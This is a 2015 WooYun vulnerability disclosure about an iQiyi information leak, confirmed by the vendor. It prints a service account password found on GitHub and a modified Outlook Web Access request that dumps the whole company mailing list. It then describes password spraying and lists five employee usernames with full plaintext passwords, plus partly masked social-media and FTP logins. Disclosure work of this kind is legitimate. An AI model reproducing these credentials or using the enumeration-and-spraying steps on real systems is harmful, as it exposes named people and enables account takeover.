当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139833

漏洞标题:从爱奇艺某处信息泄露到一些权限

相关厂商:奇艺

漏洞作者: 鸟云厂商

提交时间:2015-09-09 00:31

修复时间:2015-10-24 10:08

公开时间:2015-10-24 10:08

漏洞类型:内部绝密信息泄漏

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-09: 细节已通知厂商并且等待厂商处理中
2015-09-09: 厂商已经确认,细节仅向厂商公开
2015-09-19: 细节向核心白帽子及相关领域专家公开
2015-09-29: 细节向普通白帽子公开
2015-10-09: 细节向实习白帽子公开
2015-10-24: 细节向公众公开

简要描述:

爱奇艺某处信息泄露

详细说明:

从github撕开口子
server['user'] = "cloud-autosender"
server['passwd'] = "!7ujm.lo9"
拿到部分敏感信息
OWA关闭了通讯录功能
但是存在一个邮件组,包含了爱奇艺所有邮箱
在搜索框输入:[email protected]
会加载成员

QQ20150908-1@2x.png


通过抓包可以抓到一个请求

POST /owa/service.svc?action=GetGroup&ID=1&AC=1 HTTP/1.1
Host: mail.qiyi.com
{"itemId":null,"adObjectId":"5a5f17c0-e3f6-41f6-86ef-5ae56f55b386","emailAddress":{"__type":"EmailAddress:#Exchange","EmailAddress":"[email protected]","RoutingType":"SMTP"},"paging":{"__type":"IndexedPageView:#Exchange","BasePoint":"Beginning","MaxEntriesReturned":30,"Offset":322},"resultSet":2}


这里把MaxEntriesReturned数值改为10000
然后重播请求,response里出现所有成员

QQ20150908-1.png


拿出来正则匹配&去重
得到所有邮件账户
做一次口令检测

QQ20150908-3@2x.png


《大牌对王牌》官方SNS账号如下,请跟进运营后续工作,TKS
微博
账号:b*****[email protected]
密码:da********i8
微信
账号:sun***[email protected]
密码:iq***wp


QQ20150908-2@2x.png


因与海外合作已经开始,还望各位老师帮忙,最晚下周一,将节目传输至:
FTP上传地址:
内网是:10.10.143.38
外网是:106.1****0.98
上传账号:zi****ng-sc
上传密码:XS***zaq!
微博:
登陆账号:h****[email protected]
微博密码:o***1
安全邮箱:oux****[email protected]
微信公众平台:
登陆账号:o****[email protected]
登陆密码:o****1
16W粉丝

QQ20150908-5@2x.png


弱口令:

gaojingwei	Qiyi@123
leijing Qiyi@1234
luxin Qiyi@1234
wangluhan Qwer1234
zhangxiaoya Iqiyi123

漏洞证明:

修复方案:

版权声明:转载请注明来源 鸟云厂商@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-09 10:07

厂商回复:

感谢关注爱奇艺PPS,漏洞正在处理~

最新状态:

暂无